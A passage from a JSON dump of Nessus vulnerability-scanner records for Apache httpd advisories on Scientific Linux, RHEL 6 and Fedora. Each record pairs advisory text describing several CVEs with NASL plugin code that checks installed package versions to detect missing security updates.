is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 6.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL6\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-debuginfo-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-devel-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-manual-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\nif (rpm_check(release:\"SL6\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) 
audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T14:39:12", "description": "Updated httpd packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via RHSA-2011:1391) did not completely address the problem. An attacker could bypass the fix and make a reverse proxy connect to an arbitrary server not directly accessible to the attacker by sending an HTTP version 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error page generated when receiving an excessively long or malformed header. Malicious JavaScript running in the server's domain context could use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was found in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user permitted to override the httpd configuration for a specific directory using a '.htaccess' file, could use this flaw to crash the httpd child process or, possibly, execute arbitrary code with the privileges of the 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information. 
A malicious program running with httpd child process privileges (such as a PHP or CGI script) could use this flaw to cause the parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon will be restarted automatically.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-14T00:00:00", "type": "nessus", "title": "RHEL 6 : httpd (RHSA-2012:0128)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2011-4317", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:httpd", "p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo", "p-cpe:/a:redhat:enterprise_linux:httpd-devel", "p-cpe:/a:redhat:enterprise_linux:httpd-manual", "p-cpe:/a:redhat:enterprise_linux:httpd-tools", "p-cpe:/a:redhat:enterprise_linux:mod_ssl", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.2"], "id": "REDHAT-RHSA-2012-0128.NASL", "href": "https://www.tenable.com/plugins/nessus/57931", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0128. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57931);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2011-3607\", \"CVE-2011-3639\", \"CVE-2011-4317\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(50494, 50802, 51407, 51706, 51869);\n script_xref(name:\"RHSA\", value:\"2012:0128\");\n\n script_name(english:\"RHEL 6 : httpd (RHSA-2012:0128)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated httpd packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker\ncould bypass the fix and make a reverse proxy connect to an arbitrary\nserver not directly accessible to the attacker by sending an HTTP\nversion 0.9 request, or by using a specially crafted URI.\n(CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default\nerror page generated when receiving an excessively long or malformed\nheader. 
Malicious JavaScript running in the server's domain context\ncould use this flaw to gain access to httpOnly cookies.\n(CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions.\nAn attacker able to set certain httpd settings, such as a user\npermitted to override the httpd configuration for a specific directory\nusing a '.htaccess' file, could use this flaw to crash the httpd child\nprocess or, possibly, execute arbitrary code with the privileges of\nthe 'apache' user. (CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status\ninformation. A malicious program running with httpd child process\nprivileges (such as a PHP or CGI script) could use this flaw to cause\nthe parent httpd process to crash during httpd service shutdown.\n(CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which\ncontain backported patches to correct these issues. After installing\nthe updated packages, the httpd daemon will be restarted\nautomatically.\"\n );\n # https://rhn.redhat.com/errata/RHSA-2011-1391.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2011:1391\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2012:0128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-4317\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3607\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2011-3639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0053\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2012-0031\"\n );\n 
script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-14-410\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpd-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/11/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2012:0128\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-2.2.15-15.el6_2.1\")) 
flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-debuginfo-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-devel-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"httpd-manual-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"httpd-tools-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"mod_ssl-2.2.15-15.el6_2.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-debuginfo / httpd-devel / httpd-manual / httpd-tools / etc\");\n }\n}\n", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:58:57", "description": "This update contains the latest stable release of the Apace HTTP Server, version 2.2.22. This release fixes various bugs, and the following security issues :\n\n - Reject requests where the request-URI does not match the HTTP specification, preventing unexpected expansion of target URLs in some reverse proxy configurations.\n (CVE-2011-3368)\n\n - Fix integer overflow in ap_pregsub() which, when the mod_setenvif module is enabled, could allow local users to gain privileges via a .htaccess file. 
(CVE-2011-3607)\n\n - Resolve additional cases of URL rewriting with ProxyPassMatch or RewriteRule, where particular request-URIs could result in undesired backend network exposure in some configurations. (CVE-2011-4317)\n\n - mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format string is in use and a client sends a nameless, valueless cookie, causing a denial of service. The issue existed since version 2.2.17. (CVE-2012-0021)\n\n - Fix scoreboard issue which could allow an unprivileged child process could cause the parent to crash at shutdown rather than terminate cleanly. (CVE-2012-0031)\n\n - Fixed an issue in error responses that could expose 'httpOnly' cookies when no custom ErrorDocument is specified for status code 400. (CVE-2012-0053)\n\nhttp://www.apache.org/dist/httpd/CHANGES_2.2.22\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-03-07T00:00:00", "type": "nessus", "title": "Fedora 15 : httpd-2.2.22-1.fc15 (2012-1642)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2012-1642.NASL", "href": "https://www.tenable.com/plugins/nessus/58252", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-1642.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58252);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", 
value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2011-4317\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 50802, 51407, 51705, 51706);\n script_xref(name:\"FEDORA\", value:\"2012-1642\");\n\n script_name(english:\"Fedora 15 : httpd-2.2.22-1.fc15 (2012-1642)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains the latest stable release of the Apace HTTP\nServer, version 2.2.22. This release fixes various bugs, and the\nfollowing security issues :\n\n - Reject requests where the request-URI does not match the\n HTTP specification, preventing unexpected expansion of\n target URLs in some reverse proxy configurations.\n (CVE-2011-3368)\n\n - Fix integer overflow in ap_pregsub() which, when the\n mod_setenvif module is enabled, could allow local users\n to gain privileges via a .htaccess file. (CVE-2011-3607)\n\n - Resolve additional cases of URL rewriting with\n ProxyPassMatch or RewriteRule, where particular\n request-URIs could result in undesired backend network\n exposure in some configurations. (CVE-2011-4317)\n\n - mod_log_config: Fix segfault (crash) when the\n '%{cookiename}C' log format string is in use and a\n client sends a nameless, valueless cookie, causing a\n denial of service. The issue existed since version\n 2.2.17. (CVE-2012-0021)\n\n - Fix scoreboard issue which could allow an unprivileged\n child process could cause the parent to crash at\n shutdown rather than terminate cleanly. (CVE-2012-0031)\n\n - Fixed an issue in error responses that could expose\n 'httpOnly' cookies when no custom ErrorDocument is\n specified for status code 400. 
(CVE-2012-0053)\n\nhttp://www.apache.org/dist/httpd/CHANGES_2.2.22\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/httpd/CHANGES_2.2.22\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=785070\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=787325\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-March/074371.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1200a082\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/03/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"httpd-2.2.22-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-03-27T14:38:45", "description": "This update contains the latest stable release of the Apace HTTP Server, version 2.2.22. 
This release fixes various bugs, and the following security issues :\n\n - Reject requests where the request-URI does not match the HTTP specification, preventing unexpected expansion of target URLs in some reverse proxy configurations.\n (CVE-2011-3368)\n\n - Fix integer overflow in ap_pregsub() which, when the mod_setenvif module is enabled, could allow local users to gain privileges via a .htaccess file. (CVE-2011-3607)\n\n - Resolve additional cases of URL rewriting with ProxyPassMatch or RewriteRule, where particular request-URIs could result in undesired backend network exposure in some configurations. (CVE-2011-4317)\n\n - mod_log_config: Fix segfault (crash) when the '%{cookiename}C' log format string is in use and a client sends a nameless, valueless cookie, causing a denial of service. The issue existed since version 2.2.17. (CVE-2012-0021)\n\n - Fix scoreboard issue which could allow an unprivileged child process could cause the parent to crash at shutdown rather than terminate cleanly. (CVE-2012-0031)\n\n - Fixed an issue in error responses that could expose 'httpOnly' cookies when no custom ErrorDocument is specified for status code 400. (CVE-2012-0053)\n\nhttp://www.apache.org/dist/httpd/CHANGES_2.2.22\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2012-02-21T00:00:00", "type": "nessus", "title": "Fedora 16 : httpd-2.2.22-1.fc16 (2012-1598)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-4317", "CVE-2012-0021", "CVE-2012-0031", "CVE-2012-0053"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:httpd", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2012-1598.NASL", "href": "https://www.tenable.com/plugins/nessus/58050", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2012-1598.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(58050);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3607\", \"CVE-2012-0021\", \"CVE-2012-0031\", \"CVE-2012-0053\");\n script_bugtraq_id(49957, 50494, 51407, 51705, 51706);\n script_xref(name:\"FEDORA\", value:\"2012-1598\");\n\n script_name(english:\"Fedora 16 : httpd-2.2.22-1.fc16 (2012-1598)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains the latest stable release of the Apace HTTP\nServer, version 2.2.22. 
This release fixes various bugs, and the\nfollowing security issues :\n\n - Reject requests where the request-URI does not match the\n HTTP specification, preventing unexpected expansion of\n target URLs in some reverse proxy configurations.\n (CVE-2011-3368)\n\n - Fix integer overflow in ap_pregsub() which, when the\n mod_setenvif module is enabled, could allow local users\n to gain privileges via a .htaccess file. (CVE-2011-3607)\n\n - Resolve additional cases of URL rewriting with\n ProxyPassMatch or RewriteRule, where particular\n request-URIs could result in undesired backend network\n exposure in some configurations. (CVE-2011-4317)\n\n - mod_log_config: Fix segfault (crash) when the\n '%{cookiename}C' log format string is in use and a\n client sends a nameless, valueless cookie, causing a\n denial of service. The issue existed since version\n 2.2.17. (CVE-2012-0021)\n\n - Fix scoreboard issue which could allow an unprivileged\n child process could cause the parent to crash at\n shutdown rather than terminate cleanly. (CVE-2012-0031)\n\n - Fixed an issue in error responses that could expose\n 'httpOnly' cookies when no custom ErrorDocument is\n specified for status code 400. (CVE-2012-0053)\n\nhttp://www.apache.org/dist/httpd/CHANGES_2.2.22\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.apache.org/dist/httpd/CHANGES_2.2.22\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=785070\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2012-February/073489.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec1cc0a9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected httpd package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:16\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^16([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 16.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC16\", reference:\"httpd-2.2.22-1.fc16\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd\");\n}\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-19T12:59:01", "description": "Several vulnerabilities have been found in the Apache HTTPD Server :\n\n - CVE-2011-3607 :\n An integer overflow in ap_pregsub() could allow local attackers to execute arbitrary code at elevated privileges via crafted .htaccess files.\n\n - CVE-2011-3368 CVE-2011-3639 CVE-2011-4317 :\n The Apache HTTP Server did not properly validate the request URI for proxied requests. 
